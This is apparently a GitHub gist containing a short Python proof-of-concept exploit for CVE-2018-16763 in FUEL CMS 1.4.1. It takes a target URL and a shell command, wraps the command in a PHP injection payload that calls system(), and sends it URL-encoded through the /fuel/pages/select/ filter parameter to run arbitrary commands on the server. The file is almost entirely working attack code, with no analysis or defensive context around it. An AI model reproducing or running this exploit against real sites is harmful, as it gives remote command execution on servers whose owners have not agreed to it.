Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
FUEL CMS v1.4.1 CVE-2018-16763 PoC
"""
FUEL CMS v1.4.1 CVE-2018-16763 PoC.
This PoC was derived from: https://www.exploit-db.com/exploits/47138.
"""
import argparse
import urllib
import requests
parser = argparse.ArgumentParser('Fuel CMS v1.4 CVE-2018-16763 PoC')
parser.add_argument('url', type=str, help='URL to target, e.g. http://127.0.0.1')
parser.add_argument('cmd', type=str, help='Command to execute')
args = parser.parse_args()
url=args.url
cmd=args.cmd
payload="'+pi(print($a='system'))+$a('"+cmd+"')+'"
payload_enc=urllib.quote(payload) # URL encoded payload
filter_path='/fuel/pages/select/?filter='+payload_enc
try:
_ = requests.get(url+filter_path)
except:
pass
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment